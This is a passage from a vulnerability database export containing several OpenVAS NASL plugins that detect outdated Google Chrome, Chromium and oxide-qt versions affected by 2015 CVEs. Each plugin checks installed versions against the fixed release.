it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805375\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1250\", \"CVE-2015-1243\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-04 14:23:48 +0530 (Mon, 04 May 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 May15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A Use-after-free flaw in the MutationObserver::disconnect function\n in core/dom/MutationObserver.cpp script in the DOM implementation in Blink.\n\n - Multiple Unspecified flaws due to unknown vectors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial-of-service condition and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 42.0.2311.135 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 42.0.2311.135 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/04/stable-channel-update_28.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)) exit(0);\n\nif(version_is_less(version:chromeVer, test_version:\"42.0.2311.135\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 42.0.2311.135' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-05-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-2582-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842201", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-2582-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842201\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-07 06:13:13 +0200 (Thu, 07 May 2015)\");\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-2582-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A use-after-free was discovered in the DOM\nimplementation in Blink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial of service\nvia renderer crash, or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2015-1243)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1250)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 14.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2582-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2582-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.6.6-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.6.6-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.6.6-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:37:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-04-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2015:0682-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850648", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850648", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850648\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-04-09 07:07:09 +0200 (Thu, 09 Apr 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2015:0682-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium was updated to 41.0.2272.118 to\n fix two security issues.\n\n The following vulnerabilities were fixed:\n\n * A combination of V8, Gamepad and IPC bugs could lead to remote code\n execution outside of the sandbox (CVE-2015-1233, boo#925713)\n\n * Buffer overflow via race condition in GPU (CVE-2015-1234, boo#925714)\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:0682-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~41.0.2272.118~75.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:58", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-04-06T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 Apr15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805358", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities-01 Apr15 (Windows)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805358\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1234\", \"CVE-2015-1233\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-06 14:45:55 +0530 (Mon, 06 Apr 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 Apr15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A race condition in gpu/command_buffer/service/gles2_cmd_decoder.cc that\n is triggered when calculating certain sizes.\n\n - Unspecified flaws in V8, Gamepad, and IPC.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass sandbox protection mechanisms and execute arbitrary code\n and or cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 41.0.2272.118 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 41.0.2272.118 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://msisac.cisecurity.org/advisories/2015/2015-037.cfm\");\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/04/stable-channel-update.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)) exit(0);\n\nif(version_is_less(version:chromeVer, test_version:\"41.0.2272.118\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 41.0.2272.118' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:12:52", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-04-06T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 Apr15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805359", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities-01 Apr15 (Mac OS X)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805359\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1234\", \"CVE-2015-1233\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-06 14:45:55 +0530 (Mon, 06 Apr 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 Apr15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A race condition in gpu/command_buffer/service/gles2_cmd_decoder.cc that\n is triggered when calculating certain sizes.\n\n - Unspecified flaws in V8, Gamepad, and IPC.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass sandbox protection mechanisms and execute arbitrary code\n and or cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 41.0.2272.118 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 41.0.2272.118 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://msisac.cisecurity.org/advisories/2015/2015-037.cfm\");\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/04/stable-channel-update.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)) exit(0);\n\nif(version_is_less(version:chromeVer, test_version:\"41.0.2272.118\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 41.0.2272.118' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:54", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-04-06T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 Apr15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805360", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_google_chrome_mult_vuln01_apr15_lin.nasl 2015-04-06 14:45:55 +0530 Apr$\n#\n# Google Chrome Multiple Vulnerabilities-01 Apr15 (Linux)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805360\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1234\", \"CVE-2015-1233\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-06 14:45:55 +0530 (Mon, 06 Apr 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 Apr15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A race condition in gpu/command_buffer/service/gles2_cmd_decoder.cc that\n is triggered when calculating certain sizes.\n\n - Unspecified flaws in V8, Gamepad, and IPC.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass sandbox protection mechanisms and execute arbitrary code\n and or cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 41.0.2272.118 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 41.0.2272.118 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://msisac.cisecurity.org/advisories/2015/2015-037.cfm\");\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/04/stable-channel-update.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)) exit(0);\n\nif(version_is_less(version:chromeVer, test_version:\"41.0.2272.118\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 41.0.2272.118' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-04-08T00:00:00", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-2556-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1317", "CVE-2015-1233", "CVE-2015-1234"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842157", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-2556-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842157\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-08 07:30:54 +0200 (Wed, 08 Apr 2015)\");\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\", \"CVE-2015-1317\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-2556-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Chromium did not\nproperly handle the interaction of IPC, the gamepad API and V8. If a user were\ntricked in to opening a specially crafted website, an attacker could potentially\nexploit this to execute arbitrary code with the privileges of the user invoking\nthe program. (CVE-2015-1233)\n\nA buffer overflow was discovered in the GPU service. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via application\ncrash. (CVE-2015-1234)\n\nIt was discovered that Oxide did not correctly manage the lifetime of\nBrowserContext, resulting in a potential use-after-free in some\ncircumstances. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial of\nservice via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1317)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 14.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2556-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2556-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.5.6-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.5.6-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.5.6-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.5.6-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": 